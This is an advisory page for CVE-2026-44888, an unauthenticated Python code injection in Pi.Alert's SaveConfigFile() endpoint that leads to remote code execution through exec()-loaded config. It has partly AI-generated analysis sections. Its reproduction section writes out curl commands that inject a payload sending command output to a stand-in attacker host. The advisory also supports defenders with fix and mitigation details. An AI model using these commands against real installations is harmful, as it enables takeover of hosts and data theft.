CVE-2026-44888
Description
Pi.Alert is a WIFI / LAN intruder detector with web service monitoring. Prior to 2026-05-07, Pi.Alert's SaveConfigFile() endpoint writes user-supplied numeric config values (e.g., SMTP_PORT) directly into pialert.conf without validation. Since pialert.conf is loaded via Python's exec() every 3–5 minutes by the background cron process, an attacker can inject arbitrary Python code and achieve unauthenticated OS-level RCE. On default installations (PIALERT_WEB_PROTECTION = False), no credentials are required. This vulnerability is fixed in 2026-05-07.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Unauthenticated Python code injection via Pi.Alert's SaveConfigFile() allows unvalidated config values to be executed by cron, leading to OS-level RCE.
Vulnerability
Pi.Alert versions prior to 2026-05-07 contain an unauthenticated arbitrary Python code injection vulnerability in the SaveConfigFile() endpoint (front/php/server/files.php). The endpoint writes user-supplied numeric config values (e.g., SMTP_PORT) directly into /config/pialert.conf without validation. The configuration file is then loaded via Python's exec() function every 3–5 minutes by the background cron process (back/pialert.py:52), allowing injection of arbitrary Python code. Other injectable fields include REPORT_MQTT_PORT, AUTO_DB_BACKUP_KEEP, PUSHSAFER_PRIO, and PUSHOVER_PRIO [1].
Exploitation
An unauthenticated attacker can exploit this vulnerability in two steps. First, obtain a valid session by accessing index.php — on default installations where PIALERT_WEB_PROTECTION is False, the server automatically grants a session without requiring credentials [1]. Second, send a POST request to files.php with action=SaveConfigFile and a crafted configfile parameter containing a numeric value appended with Python code, such as 25; import os; os.system("id"). The attacker must ensure the request reaches the vulnerable endpoint and that the cron service is running to trigger execution within the 3–5 minute window [1].
Impact
Successful exploitation results in unauthenticated remote code execution (RCE) as the operating system user running the Pi.Alert cron process. The attacker gains full control over the host system, including the ability to exfiltrate data, install malware, pivot to internal networks, and disrupt service availability [1].
Mitigation
The vulnerability is fixed in Pi.Alert version 2026-05-07 [1]. Users must update to this or any later release to remediate the issue. There are no known workarounds for unpatched installations; restricting network access to the Pi.Alert web interface and enabling PIALERT_WEB_PROTECTION may reduce risk but do not fully block exploitation if an attacker already has network access. The CVE is not listed in CISA's Known Exploited Vulnerabilities catalog as of publication date.
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input validation on numeric config values allows injection of arbitrary Python code into a file loaded via exec()."
Attack vector
An unauthenticated attacker first obtains a session cookie by requesting `index.php` — on default installations (`PIALERT_WEB_PROTECTION = False`), no credentials are checked and a session is auto-granted [ref_id=1]. The attacker then sends a POST request to `SaveConfigFile()` with a crafted numeric config value (e.g., `SMTP_PORT`) containing a semicolon followed by arbitrary Python code. The value is written unquoted into `pialert.conf`. Within 3–5 minutes, the background cron process runs `pialert.py`, which calls `exec()` on the config file, executing the injected code as the OS user (typically `pi` or `root`) [ref_id=1].
Affected code
The vulnerable endpoint is `SaveConfigFile()` in `front/php/server/files.php`. The regex at line 564 captures unquoted values including semicolons and Python syntax, and numeric fields like `SMTP_PORT` (line 681) are written into `pialert.conf` without `is_numeric()` validation. The config is then loaded via `exec()` in `back/pialert.py:52` every 3–5 minutes by cron [ref_id=1].
What the fix does
The advisory states the fix is in the 2026-05-07 release but does not include a patch diff. The remediation guidance is to validate that numeric config values pass `is_numeric()` before writing them to `pialert.conf`, preventing injection of semicolons and Python syntax. Without such validation, the `exec()`-based config loading remains a direct RCE vector [ref_id=1].
Preconditions
- configDefault config has PIALERT_WEB_PROTECTION = False, so no authentication is required
- networkAttacker must have network access to the Pi.Alert web interface
- configThe cron job that runs pialert.py must be active (runs every 3-5 minutes by default)
- inputAttacker submits a crafted numeric config value containing Python code via the SaveConfigFile() endpoint
Reproduction
1. Obtain an unauthenticated session: `curl -c cookies.txt http://<target>/index.php` 2. Submit the injected config: `curl -b cookies.txt --data-urlencode "action=SaveConfigFile" --data-urlencode "configfile=...SMTP_PORT = 25; import os; os.system('curl http://attacker.com/$(id|base64 -w0)')..." http://<target>/php/server/files.php` 3. Within 3–5 minutes, the cron job triggers `exec()` on the config file, executing the injected command [ref_id=1].
Generated on May 27, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1News mentions
0No linked articles in our index yet.